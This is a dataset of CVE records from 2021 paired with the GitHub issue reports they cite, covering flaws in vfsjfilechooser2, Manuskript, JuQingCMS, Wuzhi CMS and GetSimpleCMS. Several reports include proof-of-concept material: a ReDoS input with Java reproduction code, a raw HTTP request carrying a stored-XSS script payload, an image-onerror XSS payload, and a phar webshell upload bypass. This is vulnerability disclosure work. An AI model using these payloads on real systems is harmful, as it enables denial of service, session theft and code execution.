HTML in String fields is not escaped if only preview is loaded
https://api.github.com/repos/mongo-express/mongo-express/issues/577/comments
1
2020-05-30T09:14:49Z
2021-03-05T04:00:26Z
https://github.com/mongo-express/mongo-express/issues/577
627,686,524
577
2,090
CVE-2021-29061
2021-06-21T20:15:09.437
A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in Vfsjfilechooser2 version 0.2.9 and below which occurs when the application attempts to validate crafted URIs.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/fracpete/vfsjfilechooser2/commit/9c9f2c317f3de5ece60a3ae28c371e9796e3909b" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/fracpete/vfsjfilechooser2/issues/7" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/fracpete/vfsjfilechooser2/releases/tag/vfsjfilechooser2-0.2.9" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/yetingli/PoCs/blob/main/CVE-2021-29061/Vfsjfilechooser2.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/yetingli/SaveResults/blob/main/md/vfsjfilechooser2.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/fracpete/vfsjfilechooser2/commit/9c9f2c317f3de5ece60a3ae28c371e9796e3909b" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/fracpete/vfsjfilechooser2/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/fracpete/vfsjfilechooser2/releases/tag/vfsjfilechooser2-0.2.9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/yetingli/PoCs/blob/main/CVE-2021-29061/Vfsjfilechooser2.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/yetingli/SaveResults/blob/main/md/vfsjfilechooser2.md" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vfsjfilechooser2_project:vfsjfilechooser2:*:*:*:*:*:*:*:*", "matchCriteriaId": "0335B465-A9F2-4EE5-BD3C-7D945985E04B", "versionEndExcluding": null, "versionEndIncluding": "0.2.9", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/fracpete/vfsjfilechooser2/issues/7
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "fracpete", "vfsjfilechooser2" ]
**Type of Issue** Potential Regex Denial of Service (ReDoS) **Description** The vulnerable regular expression is located in https://github.com/fracpete/vfsjfilechooser2/blob/5a5f3487dd44066beb2351a332751932df39973b/src/main/java/com/googlecode/vfsjfilechooser2/utils/VFSURIValidator.java#L235 The ReDOS vulnerability can be exploited with the following string `ftp://:@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::` You can execute the following code to reproduce ReDos ```Java import com.googlecode.vfsjfilechooser2.utils.VFSURIValidator; public class Main { public static void main(String[] args) { VFSURIValidator v = new VFSURIValidator(); String _uri = "ftp://:@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::@::"; System.out.println(v.isValid(_uri)); } } ``` I think you can limit the input length or modify this regex.
Vulnerable Regular Expression in vfsjfilechooser2
https://api.github.com/repos/fracpete/vfsjfilechooser2/issues/7/comments
5
2020-09-30T14:56:00Z
2021-06-22T07:17:33Z
https://github.com/fracpete/vfsjfilechooser2/issues/7
712,021,471
7
2,091
CVE-2021-35196
2021-06-21T23:15:10.723
Manuskript through 0.12.0 allows remote attackers to execute arbitrary code via a crafted settings.pickle file in a project file, because there is insecure deserialization via the pickle.load() function in settings.py. NOTE: the vendor's position is that the product is not intended for opening an untrusted project file
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/olivierkes/manuskript/issues/891" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.pizzapower.me/2021/06/20/arbitrary-code-execution-in-manuskript-0-12/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/olivierkes/manuskript/issues/891" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.pizzapower.me/2021/06/20/arbitrary-code-execution-in-manuskript-0-12/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:theologeek:manuskript:*:*:*:*:*:*:*:*", "matchCriteriaId": "1B8328F9-7D6A-4C8B-8BD4-79F19AAEED9D", "versionEndExcluding": null, "versionEndIncluding": "0.12.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/olivierkes/manuskript/issues/891
[ "Third Party Advisory" ]
github.com
[ "olivierkes", "manuskript" ]
Hi, do you have a process for reporting a possible security issue with Manuskript?
Possible security issue
https://api.github.com/repos/olivierkes/manuskript/issues/891/comments
8
2021-06-17T17:52:17Z
2021-11-07T12:37:10Z
https://github.com/olivierkes/manuskript/issues/891
924,189,917
891
2,092
CVE-2020-18648
2021-06-22T15:15:11.917
Cross Site Request Forgery (CSRF) in JuQingCMS v1.0 allows remote attackers to gain local privileges via the component "JuQingCMS_v1.0/admin/index.php?c=administrator&a=add".
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/GodEpic/JuQingCMS/issues/1" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/PearlyNautilus/Security-Code-Review/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/GodEpic/JuQingCMS/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/PearlyNautilus/Security-Code-Review/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:juqingcms:juqingcms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "40002E94-97A0-40B8-AE1B-474C6D4CD17C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/GodEpic/JuQingCMS/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "GodEpic", "JuQingCMS" ]
Hi, I would like to report CSRF vulnerability in JuQingCMS V1.0. There is a CSRF vulnerability that can be added to modify administrator accounts. POC: 1.Login to administrator panel. 2.Open below URL in browser which supports flash. url:http://localhost/admin/index.php?c=administrator&a=add http://localhost/admin/index.php?c=administrator&a=edit eg: 1.Before modification ![csrf1-1](https://user-images.githubusercontent.com/32690714/54341349-af237d00-4674-11e9-8369-52866bbdc83d.png) 2.CSRF POC [csrf1.txt](https://github.com/GodEpic/JuQingCMS/files/2965308/csrf1.txt) ![csrf1-2](https://user-images.githubusercontent.com/32690714/54341371-bf3b5c80-4674-11e9-8b13-810c842db90d.png) 3.After modification ![csrf1-3](https://user-images.githubusercontent.com/32690714/54341391-c9f5f180-4674-11e9-9d19-9dbfff95699b.png) fix: Sensitive operations require validation codes, and changing passwords requires validation of old passwords.
Bug: JuQingCMS V1.0 CSRF #1
https://api.github.com/repos/GodEpic/JuQingCMS/issues/1/comments
0
2019-03-14T08:21:02Z
2019-03-14T08:21:02Z
https://github.com/GodEpic/JuQingCMS/issues/1
420,884,832
1
2,093
CVE-2020-18654
2021-06-22T16:15:07.747
Cross Site Scripting (XSS) in Wuzhi CMS v4.1.0 allows remote attackers to execute arbitrary code via the "Title" parameter in the component "/coreframe/app/guestbook/myissue.php".
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/174" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/wuzhicms/wuzhicms/issues/174" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wuzhicms:wuzhicms:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B76E69A-B2F3-4359-A7C0-046CEE2FAEEB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/wuzhicms/wuzhicms/issues/174
[ "Exploit", "Third Party Advisory" ]
github.com
[ "wuzhicms", "wuzhicms" ]
> This is a stored XSS which allows attacker to insert javascript code into database. When admin see the message, attacker is able to steal admin's cookie. **Filename** /coreframe/app/guestbook/myissue.php **Code** ```php public function ask() { $formdata = array(); $formdata['title'] = isset($GLOBALS['title']) ? remove_xss($GLOBALS['title']) : strcut($GLOBALS['content'],80); $formdata['content'] = remove_xss($GLOBALS['content']); $formdata['addtime'] = SYS_TIME; $formdata['publisher'] = $this->memberinfo['username']; $formdata['ip'] = get_ip(); $this->db->insert('guestbook', $formdata); MSG('您的提问已经提交,我们的专家会尽快给您回复',$GLOBALS['forward']); } ``` **Exploit** When we post data without parameter `title`, there will be 80 chars we can use to write payload. **POC** ``` POST /wuzhi/www/index.php?m=guestbook&f=myissue&v=ask HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://localhost/wuzhi/www/index.php?m=guestbook&f=myissue&v=newask&set_iframe=1 Content-Type: application/x-www-form-urlencoded Content-Length: 195 Connection: close Cookie: PHPSESSID=k3hg1nrarp7qrjke4vuas6qkd7; GkP_auth=Q5z1uumP3fAV7fDKVbo5FU6apF6hQ7g9OKlRM1CGAD4bOBq6RkTPc5RObAeekXPG%2Ft8%2B7ljt9FSBitASjEIHgYNo82ld56FSW0AHfJpXYdb6x4irVUUZNA%3D%3D; GkP__uid=hbE7FX8tL26Fe0bidYepPQ%3D%3D; GkP__username=KwX1%2Fxspl5hmfDne9R%2FMQQ%3D%3D; GkP__groupid=%2BFfmOH1E1TGyFg%2BKja4uQQ%3D%3D; GkP_truename=aaaa; GkP_modelid=10 Upgrade-Insecure-Requests: 1 content=%3Cscript%3Ealert%281%29%3B%3C/script%3Esdf&forward=http%3A%2F%2Flocalhost%2Fwuzhi%2Fwww%2Findex.php%3Fm%3Dguestbook%26f%3Dmyissue%26v%3Dlisting%26set_iframe%3D1&submit=%E6%8F%90%E4%BA%A4 ``` **Result** ![](http://donky.top/img/bed/cve.png)
WUZHI CMS V4.1.0 /coreframe/app/guestbook/myissue.php stored XSS vulnerability
https://api.github.com/repos/wuzhicms/wuzhicms/issues/174/comments
0
2019-03-12T07:47:12Z
2019-03-12T07:47:12Z
https://github.com/wuzhicms/wuzhicms/issues/174
419,844,137
174
2,094
CVE-2021-28976
2021-06-23T13:15:08.140
Remote Code Execution vulnerability in GetSimpleCMS before 3.3.16 in admin/upload.php via phar filess.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1335" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1335" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:get-simple:getsimplecms:*:*:*:*:*:*:*:*", "matchCriteriaId": "8AABB75C-179E-4E45-9CBB-2B5A185F34F6", "versionEndExcluding": "3.3.15", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1335
[ "Third Party Advisory" ]
github.com
[ "GetSimpleCMS", "GetSimpleCMS" ]
#### Affected version: GetSimpleCMS before 3.3.16. #### Vulnerable file: /admin/upload.php. Causes of vulnerability : upload.php does not allow direct uploading of ph* type files, and it fails when directly uploading ph* files. ![image-20210319202759593](https://user-images.githubusercontent.com/61731702/111782675-466edb00-88f4-11eb-85e2-df74fe3b0ace.png) However, you can bypass the detection by uploading a phar file and adding picture file header information such as jpg to the file to successfully upload the phar file. ![image-20210319202821966](https://user-images.githubusercontent.com/61731702/111782705-4e2e7f80-88f4-11eb-970e-6d5a5c349ac1.png) Because the phar file can be parsed normally after php7.2, you can directly upload the php webshell with the phar suffix. ![image-20210319204401342](https://user-images.githubusercontent.com/61731702/111782722-51c20680-88f4-11eb-859f-7e2a2267d5b1.png) #### Repair suggestion: add the ph* file to the upload blacklist
Before GetSimpleCMS 3.3.16 version upload.php allowed to upload executable files lead to RCE
https://api.github.com/repos/GetSimpleCMS/GetSimpleCMS/issues/1335/comments
2
2021-03-19T12:47:58Z
2021-03-19T14:19:21Z
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1335
835,953,553
1,335
2,095
CVE-2021-28977
2021-06-23T13:15:08.180
Cross Site Scripting vulnerability in GetSimpleCMS 3.3.16 in admin/upload.php by adding comments or jpg and other file header information to the content of xla, pages, and gzip files,
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1336" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1336" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:get-simple:getsimplecms:*:*:*:*:*:*:*:*", "matchCriteriaId": "0C0FB623-DB18-4FEA-8BF8-05ED9DC89E2B", "versionEndExcluding": null, "versionEndIncluding": "3.3.15", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1336
[ "Third Party Advisory" ]
github.com
[ "GetSimpleCMS", "GetSimpleCMS" ]
### Affected version : GetSimpleCMS before 3.3.16. ### Vulnerable file : /admin/upload.php. ### Vulnerability type : Cross Site Scripting(XSS) The file content filtering in upload.php is not comprehensive. Adding comments or jpg and other file header information in the file content can lead to the successful upload of files such as xla, pages, gzip, etc. that contain HTML code. If an attacker adds malicious js scripts to the HTML code, it may trigger cross-site scripting (XSS) vulnerabilities and threaten user information. ![image-20210319213534957](https://user-images.githubusercontent.com/61731702/111788739-6229af80-88fb-11eb-886f-3d39501036b3.png) ![image-20210319213004647](https://user-images.githubusercontent.com/61731702/111788750-648c0980-88fb-11eb-824c-7c79d8d32bfd.png) ![image-20210319213212954](https://user-images.githubusercontent.com/61731702/111788758-66ee6380-88fb-11eb-9217-89a0746b0aef.png) ![image-20210319213336645](https://user-images.githubusercontent.com/61731702/111788765-681f9080-88fb-11eb-9270-8895016901cf.png) ### Repair suggestion: Filter sensitive characters in uploaded files, such as <script>, etc.
Cross Site Scripting(XSS) Vulnerability via upload in Latest Release 3.3.16 admin/upload.php
https://api.github.com/repos/GetSimpleCMS/GetSimpleCMS/issues/1336/comments
2
2021-03-19T13:39:08Z
2021-03-20T15:14:33Z
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1336
836,004,224
1,336
2,096
CVE-2020-20389
2021-06-23T15:15:08.440
Cross Site Scripting (XSS) vulnerability in GetSimpleCMS 3.4.0a in admin/edit.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1321" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1321" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:get-simple:getsimplecms:3.4.0:a1:*:*:*:*:*:*", "matchCriteriaId": "E9FFAB1D-FB07-40C1-B8C0-477B66EB90CE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1321
[ "Exploit", "Third Party Advisory" ]
github.com
[ "GetSimpleCMS", "GetSimpleCMS" ]
Hi, I would like to report Cross Site Scripting(XSS) vulnerability in latest release(3.4.0a) admin/edit.php. Description: Cross-site scripting (XSS) vulnerability in edit.php url: http://localhost/admin/edit.php You can Edit html source code in rich text editor,and execute JavaScript code. payload: `<img src=x onerror=alert(1)> <--xss test` ![GetSimpleCMS_XSS1](https://user-images.githubusercontent.com/25531497/69916415-b7874680-1495-11ea-9c4a-c266d8516244.png) And visit index page. ![GetSimpleCMS_XSS2](https://user-images.githubusercontent.com/25531497/69916511-bb679880-1496-11ea-9840-1975894e1d9a.png)
Cross Site Scripting(XSS) Vulnerability in Latest Release 3.4.0a admin/edit.php
https://api.github.com/repos/GetSimpleCMS/GetSimpleCMS/issues/1321/comments
0
2019-12-01T16:05:56Z
2019-12-01T16:28:06Z
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1321
530,754,076
1,321
2,097
CVE-2020-20391
2021-06-23T15:15:08.487
Cross Site Scripting vulnerability in GetSimpleCMS 3.4.0a in admin/snippets.php via (1) Add Snippet and (2) Save snippets.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1322" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1322" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:get-simple:getsimplecms:3.4.0:a1:*:*:*:*:*:*", "matchCriteriaId": "E9FFAB1D-FB07-40C1-B8C0-477B66EB90CE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1322
[ "Exploit", "Third Party Advisory" ]
github.com
[ "GetSimpleCMS", "GetSimpleCMS" ]
